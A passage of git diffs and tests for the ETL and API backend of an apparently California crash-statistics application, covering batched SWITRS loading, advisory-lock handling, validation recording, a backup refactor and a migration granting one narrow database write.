         max_drop_pct=5,

--- a/backend/etl/load_crashes.py
+++ b/backend/etl/load_crashes.py
@@ -183,6 +183,53 @@ def upsert_crashes(
     return len(rows)
 
 
+def select_years_to_load(
+    start_year: int,
+    end_year: int,
+    loaded: dict[int, int],
+    source_filter: str | None = None,
+    force: bool = False,
+    today_year: int | None = None,
+) -> tuple[list[int], list[int], list[int]]:
+    """Partition the requested year range into SWITRS/CCRS years to load.
+
+    Years that already have rows are skipped — except the current and
+    previous year, which keep receiving new CHP records nightly and are
+    always reloaded (the ON CONFLICT upsert makes re-loading them safe).
+    Without that exception, the daily job would no-op as soon as a year
+    had a single batch loaded.
+
+    Returns (switrs_years, ccrs_years, skipped_years).
+    """
+    if today_year is None:
+        today_year = datetime.now(timezone.utc).year
+
+    switrs_years = [
+        y for y in range(start_year, end_year + 1)
+        if determine_source(y) == "switrs"
+        and (source_filter is None or source_filter == "switrs")
+    ]
+    ccrs_years = [
+        y for y in range(start_year, end_year + 1)
+        if determine_source(y) == "ccrs"
+        and (source_filter is None or source_filter == "ccrs")
+    ]
+
+    skipped: list[int] = []
+    if not force:
+        refresh_years = {today_year, today_year - 1}
+        skipped = sorted(
+            [y for y in switrs_years if y in loaded]
+            + [y for y in ccrs_years if y in loaded and y not in refresh_years]
+        )
+        switrs_years = [y for y in switrs_years if y not in loaded]
+        ccrs_years = [
+            y for y in ccrs_years if y not in loaded or y in refresh_years
+        ]
+
+    return switrs_years, ccrs_years, skipped
+
+
 def run(
     start_year: int = DEFAULT_START_YEAR,
     end_year: int = DEFAULT_END_YEAR,
@@ -237,29 +284,16 @@ def run(
     error_message = None
 
     try:
-        # Partition years into SWITRS vs CCRS based on source routing
-        switrs_years = [
-            y for y in range(start_year, end_year + 1)
-            if determine_source(y) == "switrs"
-            and (source_filter is None or source_filter == "switrs")
-        ]
-        ccrs_years = [
-            y for y in range(start_year, end_year + 1)
-            if determine_source(y) == "ccrs"
-            and (source_filter is None or source_filter == "ccrs")
-        ]
-
-        # Skip years that already have data (unless --force)
-        if not force:
-            skipped_switrs = [y for y in switrs_years if y in loaded]
-            skipped_ccrs = [y for y in ccrs_years if y in loaded]
-            switrs_years = [y for y in switrs_years if y not in loaded]
-            ccrs_years = [y for y in ccrs_years if y not in loaded]
-            if skipped_switrs or skipped_ccrs:
-                logger.info(
-                    "Skipping already-loaded years: %s (use --force to reload)",
-                    sorted(skipped_switrs + skipped_ccrs),
-                )
+        # Partition years into SWITRS vs CCRS and drop already-loaded years
+        # (current + previous year are always reloaded; see the helper).
+        switrs_years, ccrs_years, skipped = select_years_to_load(
+            start_year, end_year, loaded, source_filter=source_filter, force=force,
+        )
+        if skipped:
+            logger.info(
+                "Skipping already-loaded years: %s (use --force to reload)",
+                skipped,
+            )
 
         logger.info(
             "Year range %d–%d: %d SWITRS years, %d CCRS years to load",

--- a/backend/etl/load_crashes.py
+++ b/backend/etl/load_crashes.py
@@ -303,10 +303,12 @@ def run(
         failed_batches = 0
 
         # --- SWITRS years ---
-        # Download the archive once, then read all years from the SQLite file.
-        # This avoids re-downloading for each year (the archive is ~1 GB).
+        # Download the archive once, then STREAM batches from the SQLite
+        # file. Materializing all 15 years at once (~6-7M dicts, multiple GB
+        # of RSS) has OOM-killed this VM before — each batch is upserted
+        # before the next is read, so memory stays flat.
         if switrs_years:
-            from etl.switrs_api import download_switrs_archive, read_crashes_from_sqlite  # noqa: PLC0415
+            from etl.switrs_api import download_switrs_archive, iter_crashes_from_sqlite  # noqa: PLC0415
 
             tmp_dir = tempfile.mkdtemp(prefix="switrs_")
             logger.info("Downloading SWITRS archive to %s", tmp_dir)
@@ -314,26 +316,28 @@ def run(
 
             switrs_start = min(switrs_years)
             switrs_end = max(switrs_years)
-            all_switrs_rows = read_crashes_from_sqlite(sqlite_path, switrs_start, switrs_end)
-
             logger.info(
-                "SWITRS: %d records for years %d–%d, upserting in batches of %d",
-                len(all_switrs_rows), switrs_start, switrs_end, BATCH_SIZE,
+                "SWITRS: streaming years %d–%d in batches of %d",
+                switrs_start, switrs_end, BATCH_SIZE,
             )
 
-            for batch_start in range(0, len(all_switrs_rows), BATCH_SIZE):
-                batch = all_switrs_rows[batch_start: batch_start + BATCH_SIZE]
+            switrs_rows_seen = 0
+            for batch in iter_crashes_from_sqlite(
+                sqlite_path, switrs_start, switrs_end, batch_size=BATCH_SIZE,
+            ):
+                batch_start = switrs_rows_seen
+                switrs_rows_seen += len(batch)
                 try:
                     count = upsert_crashes(db, batch, city_lookup=city_lookup)
                     db.commit()
                     total_rows += count
                     logger.info(
                         "SWITRS batch [%d:%d]: %d rows upserted",
-                        batch_start, batch_start + len(batch), count,
+                        batch_start, switrs_rows_seen, count,
                     )
                 except Exception as exc:
                     failed_batches += 1
-                    logger.error("SWITRS batch [%d:%d] failed: %s", batch_start, batch_start + len(batch), exc)
+                    logger.error("SWITRS batch [%d:%d] failed: %s", batch_start, switrs_rows_seen, exc)
                     db.rollback()
 
         # --- CCRS years ---

--- a/backend/etl/orchestrator.py
+++ b/backend/etl/orchestrator.py
@@ -9,7 +9,8 @@ from dataclasses import dataclass, field
 from datetime import datetime, timedelta, timezone
 from typing import Literal
 
-from sqlalchemy import text
+from sqlalchemy import func, select, text
+from sqlalchemy import table as sa_table
 
 from app.database import EtlSessionLocal as SessionLocal, etl_engine  # write/DDL role
 from app.models import EtlRun
@@ -88,8 +89,11 @@ _IDENT_RE = re.compile(r"^[a-z_][a-z0-9_]*$")
 def _table_row_count(db, table_name: str | None) -> int | None:
     """COUNT(*) for a job's target table, or None if it has none / errors.
 
-    table_name comes from the trusted Job registry, never user input, but we
-    still validate the identifier before interpolating it into SQL.
+    table_name comes from the trusted Job registry, never user input. We both
+    validate the identifier AND build the statement with SQLAlchemy Core
+    (func.count() over a table() clause) rather than interpolating the name
+    into a raw SQL string — SQLAlchemy renders it as a quoted identifier, so
+    the table name never flows into query text as concatenated SQL.
     """
     if not table_name:
         return None
@@ -97,7 +101,8 @@ def _table_row_count(db, table_name: str | None) -> int | None:
         logger.warning("Refusing to count suspicious table name: %r", table_name)
         return None
     try:
-        return db.execute(text(f"SELECT COUNT(*) FROM {table_name}")).scalar()
+        stmt = select(func.count()).select_from(sa_table(table_name))
+        return db.execute(stmt).scalar()
     except Exception as exc:
         logger.warning("Row count for %s failed: %s", table_name, exc)
         return None

--- a/backend/etl/orchestrator.py
+++ b/backend/etl/orchestrator.py
@@ -10,7 +10,7 @@ from typing import Literal
 
 from sqlalchemy import text
 
-from app.database import EtlSessionLocal as SessionLocal  # write/DDL role
+from app.database import EtlSessionLocal as SessionLocal, etl_engine  # write/DDL role
 from app.models import EtlRun
 
 logger = logging.getLogger(__name__)
@@ -220,26 +220,35 @@ def run_pipeline(
     skip_static: bool = True,
     force_refresh: bool = False,
 ) -> list[EtlRun]:
-    db = SessionLocal()
+    # Hold the advisory lock on a dedicated AUTOCOMMIT connection. A session
+    # would auto-begin a transaction here and keep it open ("idle in
+    # transaction") for the entire multi-hour run, pinning the xmin horizon
+    # so autovacuum — and our own tail-end vacuum job — couldn't reclaim any
+    # dead tuples the load itself produces on the 11M-row table. Session-level
+    # advisory locks live on the connection, not a transaction, so AUTOCOMMIT
+    # holds the lock just as well without blocking vacuum.
+    lock_conn = etl_engine.connect().execution_options(isolation_level="AUTOCOMMIT")
     try:
-        acquired = db.execute(
+        acquired = lock_conn.execute(
             text("SELECT pg_try_advisory_lock(:id)"), {"id": _PIPELINE_LOCK_ID}
         ).scalar()
         if not acquired:
             logger.warning("Pipeline already running (advisory lock held), skipping")
+            lock_conn.close()
             return []
     except Exception:
-        db.close()
+        lock_conn.close()
         raise
 
     try:
         return _run_pipeline_locked(registry, triggered_by, only, skip_static, force_refresh)
     finally:
         try:
-            db.execute(text("SELECT pg_advisory_unlock(:id)"), {"id": _PIPELINE_LOCK_ID})
-            db.commit()
+            lock_conn.execute(
+                text("SELECT pg_advisory_unlock(:id)"), {"id": _PIPELINE_LOCK_ID}
+            )
         finally:
-            db.close()
+            lock_conn.close()
 
 
 def _run_pipeline_locked(

--- a/backend/etl/orchestrator.py
+++ b/backend/etl/orchestrator.py
@@ -1,6 +1,7 @@
 from __future__ import annotations
 
 import logging
+import re
 import subprocess
 import sys
 import time
@@ -81,6 +82,70 @@ def resolve_execution_order(registry: JobRegistry) -> list[Job]:
     return order
 
 
+_IDENT_RE = re.compile(r"^[a-z_][a-z0-9_]*$")
+
+
+def _table_row_count(db, table_name: str | None) -> int | None:
+    """COUNT(*) for a job's target table, or None if it has none / errors.
+
+    table_name comes from the trusted Job registry, never user input, but we
+    still validate the identifier before interpolating it into SQL.
+    """
+    if not table_name:
+        return None
+    if not _IDENT_RE.match(table_name):
+        logger.warning("Refusing to count suspicious table name: %r", table_name)
+        return None
+    try:
+        return db.execute(text(f"SELECT COUNT(*) FROM {table_name}")).scalar()
+    except Exception as exc:
+        logger.warning("Row count for %s failed: %s", table_name, exc)
+        return None
+
+
+def _validate_job(db, job: Job, rows_before: int | None) -> tuple[str, str | None]:
+    """Run validation for a successful load and return (status, summary).
+
+    status is one of: "passed", "warning", "failed", "skipped".
+    Non-blocking: the caller keeps status="success" regardless — this only
+    records what the checks found. A critical failure (e.g. a row-count drop
+    beyond job.max_drop_pct) yields "failed"; non-critical issues yield
+    "warning".
+    """
+    from etl.validation import check_row_count_growth, run_validation_suite
+
+    try:
+        report = run_validation_suite(db, source=job.name)
+
+        # Row-count guard is per-job (max_drop_pct) and needs the before/after
+        # counts, so it's added here rather than inside the source suite.
+        if job.table_name and rows_before is not None:
+            report.checks.append(
+                check_row_count_growth(
+                    db, job.table_name, rows_before, max_drop_pct=job.max_drop_pct,
+                )
+            )
+
+        if not report.checks:
+            return "skipped", None
+
+        summary = "; ".join(
+            f"{c.name}: {c.message}" for c in report.checks if not c.passed
+        ) or report.summary()
+
+        if report.critical_failures:
+            logger.warning("Validation FAILED for %s: %s", job.name, summary)
+            return "failed", summary[:2000]
+        if report.warnings:
+            logger.warning("Validation warnings for %s: %s", job.name, summary)
+            return "warning", summary[:2000]
+        return "passed", report.summary()
+    except Exception as exc:
+        # A broken check must not fail an otherwise-successful load.
+        logger.exception("Validation errored for %s: %s", job.name, exc)
+        return "skipped", f"validation error: {str(exc)[:500]}"
+
+
 def run_job(job: Job, triggered_by: str = "manual", force_refresh: bool = False) -> EtlRun:
     from etl._utils import check_source_freshness
 
@@ -110,11 +175,14 @@ def run_job(job: Job, triggered_by: str = "manual", force_refresh: bool = False)
             db.close()
             return record
 
+    rows_before = _table_row_count(db, job.table_name)
+
     record = EtlRun(
         source=job.name,
         status="running",
         started_at=datetime.now(timezone.utc),
         triggered_by=triggered_by,
+        rows_before=rows_before,
     )
     db.add(record)
     db.commit()
@@ -141,10 +209,18 @@ def run_job(job: Job, triggered_by: str = "manual", force_refresh: bool = False)
             record.validation_status = "skipped"
         else:
             record.status = "success"
-            record.validation_status = "passed"
             if freshness:
                 record.last_source_modified = freshness.last_source_modified
                 record.source_row_count = freshness.source_row_count
+            # Run the validation suite against the freshly-loaded data and
+            # record the REAL outcome. Validation is non-blocking (a failure
+            # doesn't flip the load to error), but the status must reflect
+            # what actually happened — a truncated source that halved a table
+            # should read "failed", not a fabricated "passed".
+            record.rows_after = _table_row_count(db, job.table_name)
+            val_status, diff_summary = _validate_job(db, job, record.rows_before)
+            record.validation_status = val_status
+            record.diff_summary = diff_summary
 
         record.finished_at = datetime.now(timezone.utc)
         db.commit()

--- a/backend/etl/pipeline.py
+++ b/backend/etl/pipeline.py
@@ -28,11 +28,7 @@ from __future__ import annotations
 import argparse
 import logging
 import os
-import subprocess
 import sys
-import time
-from datetime import datetime, timedelta, timezone
-from pathlib import Path
 
 from apscheduler.events import EVENT_JOB_ERROR, EVENT_JOB_EXECUTED
 from apscheduler.schedulers.blocking import BlockingScheduler
@@ -168,93 +164,57 @@ def run_weekly_pipeline():
 
 
 def run_backup():
-    """Run pg_dump with 7-day rotation.
+    """Daily pg_dump + offsite R2 sync with 7-day rotation.
 
-    Backup strategy:
-      - Daily pg_dump to /backups/calsight_YYYY-MM-DD.sql.gz
-      - Keep 7 days of backups, delete older ones
-      - Uses custom format (-Fc) for parallel restore capability
-      - Excludes etl_runs (easily regenerated) to save space
+    Delegates to etl.backup — the one implementation of the dump itself.
+    That module keeps the password off the pg_dump command line (PGPASSWORD
+    instead of an inline URL, so it can't leak via /proc/<pid>/cmdline),
+    applies the min_keep rotation guard locally and in R2, and gives the
+    11M-row dump a 2-hour budget. This wrapper adds the scheduler-side
+    concerns: alerting and the dead-man's-switch heartbeat.
 
     The backup directory is /backups inside the container, mounted as a
     Docker volume that maps to the host's /opt/calsight/backups on LXC 100.
     """
-    backup_dir = Path(os.environ.get("BACKUP_DIR", "/backups"))
-    backup_dir.mkdir(parents=True, exist_ok=True)
+    from etl.backup import (  # noqa: PLC0415
+        rotate_backups,
+        rotate_r2_backups,
+        run_backup as run_pg_dump,
+        upload_to_r2,
+    )
 
-    today = datetime.now(timezone.utc).replace(tzinfo=None).strftime("%Y-%m-%d")
-    backup_file = backup_dir / f"calsight_{today}.dump"
-
-    # Build pg_dump command from the ETL database URL
-    db_url = os.environ.get("ETL_DATABASE_URL") or os.environ.get("DATABASE_URL", "")
-    if not db_url:
-        logger.error("No DATABASE_URL configured — skipping backup")
-        send_alert(AlertLevel.WARNING, "Backup skipped", "No DATABASE_URL configured")
-        send_heartbeat(success=False)
-        return
-
-    logger.info("Starting backup: %s", backup_file)
-    start = time.monotonic()
+    backup_dir = os.environ.get("BACKUP_DIR", "/backups")
 
     try:
-        result = subprocess.run(
-            [
-                "pg_dump",
-                "--format=custom",
-                "--compress=6",
-                "--exclude-table=etl_runs",  # easily regenerated, saves space
-                f"--file={backup_file}",
-                db_url,
-            ],
-            capture_output=True,
-            text=True,
-            timeout=3600,  # 1 hour max
-        )
+        backup_file = run_pg_dump(backup_dir)
+        if backup_file is None:
+            raise RuntimeError("pg_dump failed — see container logs")
 
-        if result.returncode != 0:
-            raise RuntimeError(f"pg_dump failed (exit {result.returncode}): {result.stderr[:500]}")
-
-        elapsed = time.monotonic() - start
         size_mb = backup_file.stat().st_size / (1024 * 1024)
-        logger.info("Backup complete: %.1f MB in %.0fs", size_mb, elapsed)
 
-        # Rotate: delete backups older than 7 days, but ALWAYS keep at least
-        # `min_keep` most-recent dumps regardless of age. Without this guard, if
-        # pg_dump fails for 7+ consecutive days the rotation would delete every
-        # surviving backup, leaving zero recovery points.
-        min_keep = 3
-        cutoff = datetime.now(timezone.utc).replace(tzinfo=None) - timedelta(days=7)
+        r2_ok = upload_to_r2(backup_file)
+        if not r2_ok and os.environ.get("R2_BUCKET_NAME"):
+            # R2 is configured but the upload failed — the local dump exists,
+            # so warn rather than error, but don't stay silent: offsite is
+            # the copy that survives the host dying.
+            send_alert(
+                AlertLevel.WARNING,
+                "Backup offsite upload failed",
+                f"{backup_file.name} ({size_mb:.1f} MB) saved locally but R2 upload failed",
+            )
 
-        dated_backups = []
-        for old_file in backup_dir.glob("calsight_*.dump"):
-            try:
-                date_str = old_file.stem.replace("calsight_", "")
-                file_date = datetime.strptime(date_str, "%Y-%m-%d")
-                dated_backups.append((file_date, old_file))
-            except ValueError:
-                continue
+        rotate_backups(backup_dir)
+        rotate_r2_backups()
 
-        # Newest first; the first `min_keep` are protected from deletion.
-        dated_backups.sort(key=lambda pair: pair[0], reverse=True)
-
-        removed = 0
-        for file_date, old_file in dated_backups[min_keep:]:
-            if file_date < cutoff:
-                old_file.unlink()
-                removed += 1
-                logger.info("Rotated old backup: %s", old_file.name)
-
-        if removed:
-            logger.info("Removed %d backup(s) older than 7 days", removed)
+        logger.info(
+            "Backup complete: %s (%.1f MB)%s",
+            backup_file.name, size_mb, " — uploaded to R2" if r2_ok else "",
+        )
 
         # Backup succeeded — ping the dead-man's-switch so the external monitor
         # knows the box is alive and ran the job on schedule.
         send_heartbeat(success=True)
 
-    except subprocess.TimeoutExpired:
-        send_alert(AlertLevel.ERROR, "Backup timed out", "pg_dump exceeded 1 hour timeout")
-        logger.error("Backup timed out after 1 hour")
-        send_heartbeat(success=False)
     except Exception as exc:
         send_alert(AlertLevel.ERROR, "Backup failed", str(exc)[:500])
         logger.exception("Backup failed: %s", exc)

--- a/backend/etl/switrs_api.py
+++ b/backend/etl/switrs_api.py
@@ -93,10 +93,17 @@ def _parse_switrs_datetime(date_str, time_str):
     if time_str is None or time_str == "":
         hour, minute = 0, 0
     else:
-        # Format is "HH:MM:SS" — split on colons
+        # Format is "HH:MM:SS" — split on colons. Malformed values
+        # ("UNK:00", "2500") appear in the archive; fall back to midnight
+        # rather than letting one bad row abort the whole multi-hour load.
         parts = str(time_str).split(":")
-        hour = int(parts[0]) if len(parts) >= 1 else 0
-        minute = int(parts[1]) if len(parts) >= 2 else 0
+        try:
+            hour = int(parts[0]) if len(parts) >= 1 else 0
+            minute = int(parts[1]) if len(parts) >= 2 else 0
+        except ValueError:
+            hour, minute = 0, 0
+        if not (0 <= hour <= 23 and 0 <= minute <= 59):
+            hour, minute = 0, 0
 
     try:
         date = datetime.fromisoformat(date_str)
@@ -253,10 +260,16 @@ def download_switrs_archive(dest_dir: str) -> str:
     return str(sqlite_path)
 
 
-def read_crashes_from_sqlite(
-    sqlite_path: str, start_year: int, end_year: int
-) -> list[dict]:
-    """Read and transform collision records from the SWITRS SQLite database.
+def iter_crashes_from_sqlite(
+    sqlite_path: str, start_year: int, end_year: int, batch_size: int = 5000,
+):
+    """Stream transformed collision records from the SWITRS SQLite database.
+
+    Yields lists of up to `batch_size` dicts (keys matching the Crash model
+    columns) so the caller can upsert each batch before the next is read.
+    Materializing all 15 years at once (~6-7M dicts) needs multiple GB of
+    RSS and has OOM-killed the ETL VM before — streaming keeps memory flat
+    at one batch regardless of the year range.
 
     Queries the `collisions` table one year at a time using COLLISION_DATE
     prefix matching, transforms each row via transform_switrs(), and skips
@@ -269,11 +282,9 @@ def read_crashes_from_sqlite(
         sqlite_path: Path to the extracted SWITRS .sqlite file.
         start_year: First year to load (inclusive).
         end_year: Last year to load (inclusive).
-
-    Returns:
-        List of dicts with keys matching the Crash model column names.
+        batch_size: Max records per yielded batch.
     """
-    results = []
+    total = 0
 
     with sqlite3.connect(sqlite_path) as conn:
         conn.row_factory = sqlite3.Row  # enables dict-style column access
@@ -287,6 +298,7 @@ def read_crashes_from_sqlite(
             )
 
             year_count = 0
+            batch: list[dict] = []
             for raw_row in cursor:
                 # Convert sqlite3.Row to plain dict for consistent handling
                 row = dict(raw_row)
@@ -303,13 +315,33 @@ def read_crashes_from_sqlite(
                     )
                     continue
 
-                results.append(transformed)
+                batch.append(transformed)
                 year_count += 1
+                if len(batch) >= batch_size:
+                    yield batch
+                    batch = []
 
+            if batch:
+                yield batch
+
+            total += year_count
             logger.info("Year %d: loaded %d records", year, year_count)
 
     logger.info(
         "Total SWITRS records loaded (%d–%d): %d",
-        start_year, end_year, len(results),
+        start_year, end_year, total,
     )
+
+
+def read_crashes_from_sqlite(
+    sqlite_path: str, start_year: int, end_year: int
+) -> list[dict]:
+    """Materialize the full year range as one list.
+
+    Prefer iter_crashes_from_sqlite() for multi-year loads — this exists for
+    small ranges and tests where a flat list is convenient.
+    """
+    results: list[dict] = []
+    for batch in iter_crashes_from_sqlite(sqlite_path, start_year, end_year):
+        results.extend(batch)
     return results

--- a/backend/migrations/versions/v0w1x2y3z4a5_grant_chat_feedback_insert_to_api_role.py
+++ b/backend/migrations/versions/v0w1x2y3z4a5_grant_chat_feedback_insert_to_api_role.py
@@ -1,0 +1,77 @@
+"""create chat_feedback if missing + grant INSERT to the API role
+
+Two fixes for POST /api/feedback:
+
+1. The ChatFeedback model was never migrated — no revision creates the
+   table, so any environment built purely from `alembic upgrade head`
+   is missing it. CREATE TABLE IF NOT EXISTS covers both fresh
+   databases and any environment where it was created by hand.
+
+2. The endpoint INSERTs through the API engine, which in production
+   connects as `calsight_api_ro` — a SELECT-only role. Every vote 500s
+   with "permission denied" there (dev uses a single full-privilege
+   URL, so tests never see it). Grant the one narrow write this role
+   legitimately needs; everything else stays read-only. No-op when the
+   role doesn't exist (local dev, CI databases).
+
+Revision ID: v0w1x2y3z4a5
+Revises: u9v0w1x2y3z4
+Create Date: 2026-07-01 00:00:00.000000
+"""
+from typing import Sequence, Union
+
+from alembic import op
+
+revision: str = "v0w1x2y3z4a5"
+down_revision: Union[str, None] = "u9v0w1x2y3z4"
+branch_labels: Union[str, Sequence[str], None] = None
+depends_on: Union[str, Sequence[str], None] = None
+
+
+def upgrade() -> None:
+    # Mirrors app.models.ChatFeedback. IF NOT EXISTS instead of
+    # op.create_table because production may already have a hand-made
+    # copy of this table.
+    op.execute(
+        """
+        CREATE TABLE IF NOT EXISTS chat_feedback (
+            id SERIAL PRIMARY KEY,
+            question TEXT NOT NULL,
+            answer TEXT NOT NULL,
+            provider VARCHAR(30),
+            tools_called TEXT,
+            vote VARCHAR(4) NOT NULL,
+            filters_used TEXT,
+            created_at TIMESTAMP DEFAULT now()
+        )
+        """
+    )
+    op.execute(
+        """
+        DO $$
+        BEGIN
+            IF EXISTS (SELECT 1 FROM pg_roles WHERE rolname = 'calsight_api_ro') THEN
+                GRANT SELECT, INSERT ON chat_feedback TO calsight_api_ro;
+                GRANT USAGE ON SEQUENCE chat_feedback_id_seq TO calsight_api_ro;
+            END IF;
+        END
+        $$;
+        """
+    )
+
+
+def downgrade() -> None:
+    # Leave the table in place (it may hold real feedback); only revoke
+    # the write grant this revision added.
+    op.execute(
+        """
+        DO $$
+        BEGIN
+            IF EXISTS (SELECT 1 FROM pg_roles WHERE rolname = 'calsight_api_ro')
+               AND to_regclass('public.chat_feedback') IS NOT NULL THEN
+                REVOKE INSERT ON chat_feedback FROM calsight_api_ro;
+            END IF;
+        END
+        $$;
+        """
+    )

--- a/backend/sql/create_readonly_role.sql
+++ b/backend/sql/create_readonly_role.sql
@@ -1,9 +1,10 @@
 -- Create the read-only Postgres role used by the FastAPI backend.
 --
 -- WHY:
---   All 16 API endpoints are GET / SELECT-only. The API doesn't need
---   write access — and not having it means a compromised dependency
---   can't DROP, DELETE, or UPDATE anything. Defense-in-depth.
+--   The API is SELECT-only except for one narrow write (chat_feedback
+--   votes, granted below). Not having broader write access means a
+--   compromised dependency can't DROP, DELETE, or UPDATE anything.
+--   Defense-in-depth.
 --
 -- WHO RUNS THIS:
 --   The Azure Postgres admin (i.e. you). ETL + alembic stay on the
@@ -52,6 +53,12 @@ GRANT USAGE   ON SCHEMA   public   TO calsight_api_ro;
 --    nextval()-style queries even on pure-read sessions.
 GRANT SELECT                  ON ALL TABLES    IN SCHEMA public TO calsight_api_ro;
 GRANT SELECT, USAGE           ON ALL SEQUENCES IN SCHEMA public TO calsight_api_ro;
+
+-- 3b. The one narrow write the API performs: POST /api/feedback stores
+--     thumbs up/down votes in chat_feedback. Everything else stays
+--     SELECT-only. (Also applied by migration v0w1x2y3z4a5.)
+GRANT INSERT ON chat_feedback              TO calsight_api_ro;
+GRANT USAGE  ON SEQUENCE chat_feedback_id_seq TO calsight_api_ro;
 
 -- 4. Future-proof: when alembic adds a new table or the ETL creates a
 --    new materialized view tomorrow, the API role automatically gets

--- a/backend/tests/api/test_ai_tools.py
+++ b/backend/tests/api/test_ai_tools.py
@@ -1,0 +1,65 @@
+"""Integration tests for app.ai_tools — county resolution and rate math.
+
+These pin the two silent-correctness fixes:
+  1. An unresolvable county must return an error the model can react to,
+     never fall through to statewide numbers presented as county numbers.
+  2. get_crash_rate divides by single-year denominators (population,
+     drivers), so multi-year crash totals must be annualized first.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from app.ai_tools import get_crash_rate, get_trend, query_crashes
+
+pytestmark = pytest.mark.integration
+
+
+# ── county resolution ───────────────────────────────────────────────────
+
+
+def test_query_crashes_unknown_county_returns_error_not_statewide(db_session):
+    result = query_crashes(db_session, county="Los Angelos")
+    assert result == [{"error": "County not found: Los Angelos"}]
+
+
+def test_query_crashes_known_county_still_filters(db_session):
+    # Seed: 3 LA crashes out of 5 statewide.
+    result = query_crashes(db_session, county="Los Angeles")
+    assert result[0]["crash_count"] == 3
+
+
+def test_get_trend_unknown_county_returns_error(db_session):
+    result = get_trend(db_session, metric="crash_count", county="Atlantis")
+    assert result == [{"error": "County not found: Atlantis"}]
+
+
+def test_get_crash_rate_unknown_county_returns_error(db_session):
+    result = get_crash_rate(db_session, county="Narnia")
+    assert result == {"error": "County not found: Narnia"}
+
+
+# ── rate annualization ─────────────────────────────────────────────────
+
+
+def test_crash_rate_annualizes_multi_year_totals(db_session):
+    """Seed: LA has 3 crashes across 3 distinct years (2014, 2015, 2022)
+    and population 9,861,000. The per-100k rate must use the annual
+    average (1 crash/year), not the 3-crash multi-year total."""
+    result = get_crash_rate(db_session, county="Los Angeles")
+
+    assert result["total_crashes"] == 3
+    assert result["years_covered"] == 3
+    expected = round((3 / 3) / 9_861_000 * 100_000, 1)
+    assert result["crashes_per_100k_pop"] == expected
+
+
+def test_crash_rate_single_year_unchanged(db_session):
+    """With an explicit single year the annualization is a no-op."""
+    result = get_crash_rate(db_session, county="Los Angeles", years=[2022])
+
+    assert result["total_crashes"] == 1
+    assert result["years_covered"] == 1
+    expected = round(1 / 9_861_000 * 100_000, 1)
+    assert result["crashes_per_100k_pop"] == expected

--- a/backend/tests/api/test_ask.py
+++ b/backend/tests/api/test_ask.py
@@ -160,3 +160,31 @@ def test_quick_facts_handles_zero_match_filters(client, fake_llm):
     assert r.status_code == 200
     system_msg = fake_llm[0]["messages"][0]
     assert "no crashes match these filters" in system_msg["content"].lower()
+
+
+# ── Feedback write path ─────────────────────────────────────────────────
+
+
+def test_feedback_vote_persists(client, db_session):
+    """POST /api/feedback is the API's only write; it must actually land.
+    (In production this runs as the read-only role, which migration
+    v0w1x2y3z4a5 grants the one INSERT it needs.)"""
+    from app.models import ChatFeedback
+
+    r = client.post(
+        "/api/feedback",
+        json={"question": "how many?", "answer": "42", "vote": "up"},
+    )
+    assert r.status_code == 200
+    assert r.json() == {"ok": True}
+    row = db_session.query(ChatFeedback).order_by(ChatFeedback.id.desc()).first()
+    assert row is not None
+    assert row.vote == "up"
+
+
+def test_feedback_rejects_bad_vote(client):
+    r = client.post(
+        "/api/feedback",
+        json={"question": "q", "answer": "a", "vote": "sideways"},
+    )
+    assert r.status_code == 422

--- a/backend/tests/api/test_stats.py
+++ b/backend/tests/api/test_stats.py
@@ -292,6 +292,14 @@ def test_stats_group_by_rate_la_2023_has_rates(client):
     assert response.status_code == 200
 
 
+def test_stats_group_by_rate_rejects_cause_filter(client):
+    """mv_crash_rates carries no canonical_cause — combining the two must
+    422 rather than silently return unfiltered rates as filtered."""
+    response = client.get("/api/stats?group_by=rate&cause=dui")
+    assert response.status_code == 422
+    assert response.json()["filter"] == "cause"
+
+
 # --- cause filter accepts new categories ---
 
 

--- a/backend/tests/test_load_crashes.py
+++ b/backend/tests/test_load_crashes.py
@@ -4,7 +4,11 @@ Tests pure logic (source routing) without needing a database connection.
 The actual DB upsert is exercised in the integration test.
 """
 
-from etl.load_crashes import determine_source, normalize_city_id
+from etl.load_crashes import (
+    determine_source,
+    normalize_city_id,
+    select_years_to_load,
+)
 
 
 class TestDetermineSource:
@@ -60,3 +64,57 @@ class TestNormalizeCityId:
         row = {"county_code": None, "city_name": "Los Angeles"}
         normalize_city_id(row, self.LOOKUP)
         assert row["city_id"] is None
+
+
+class TestSelectYearsToLoad:
+    """The daily job must keep re-ingesting recent years: CHP updates the
+    CCRS dataset nightly, so a year with rows is not a year that's done."""
+
+    def test_current_and_previous_year_reload_even_when_loaded(self):
+        loaded = {2025: 400_000, 2026: 120_000}
+        _, ccrs, skipped = select_years_to_load(
+            2016, 2026, loaded, source_filter="ccrs", today_year=2026,
+        )
+        assert 2026 in ccrs
+        assert 2025 in ccrs
+        assert 2026 not in skipped and 2025 not in skipped
+
+    def test_older_loaded_years_are_skipped(self):
+        loaded = {y: 500_000 for y in range(2016, 2027)}
+        _, ccrs, skipped = select_years_to_load(
+            2016, 2026, loaded, source_filter="ccrs", today_year=2026,
+        )
+        assert ccrs == [2025, 2026]
+        assert skipped == list(range(2016, 2025))
+
+    def test_unloaded_years_always_load(self):
+        _, ccrs, skipped = select_years_to_load(
+            2016, 2026, {}, source_filter="ccrs", today_year=2026,
+        )
+        assert ccrs == list(range(2016, 2027))
+        assert skipped == []
+
+    def test_force_reloads_everything(self):
+        loaded = {y: 500_000 for y in range(2016, 2027)}
+        _, ccrs, skipped = select_years_to_load(
+            2016, 2026, loaded, source_filter="ccrs", force=True, today_year=2026,
+        )
+        assert ccrs == list(range(2016, 2027))
+        assert skipped == []
+
+    def test_switrs_historical_years_still_skip(self):
+        loaded = {y: 300_000 for y in range(2001, 2016)}
+        switrs, _, skipped = select_years_to_load(
+            2001, 2015, loaded, source_filter="switrs", today_year=2026,
+        )
+        assert switrs == []
+        assert skipped == list(range(2001, 2016))
+
+    def test_year_rollover_shifts_refresh_window(self):
+        # On Jan 1 2027 the refresh window becomes {2026, 2027}; 2025 retires.
+        loaded = {2025: 400_000, 2026: 500_000}
+        _, ccrs, skipped = select_years_to_load(
+            2016, 2027, loaded, source_filter="ccrs", today_year=2027,
+        )
+        assert 2026 in ccrs and 2027 in ccrs
+        assert 2025 in skipped

--- a/backend/tests/test_orchestrator.py
+++ b/backend/tests/test_orchestrator.py
@@ -89,6 +89,83 @@ def test_default_registry_resolves_without_error():
     assert names.index("insights") < names.index("vacuum")
 
 
+class _FakeResult:
+    def __init__(self, value):
+        self._value = value
+
+    def scalar(self):
+        return self._value
+
+
+class _FakeDB:
+    """Minimal Session stand-in: returns queued COUNT(*) results in order."""
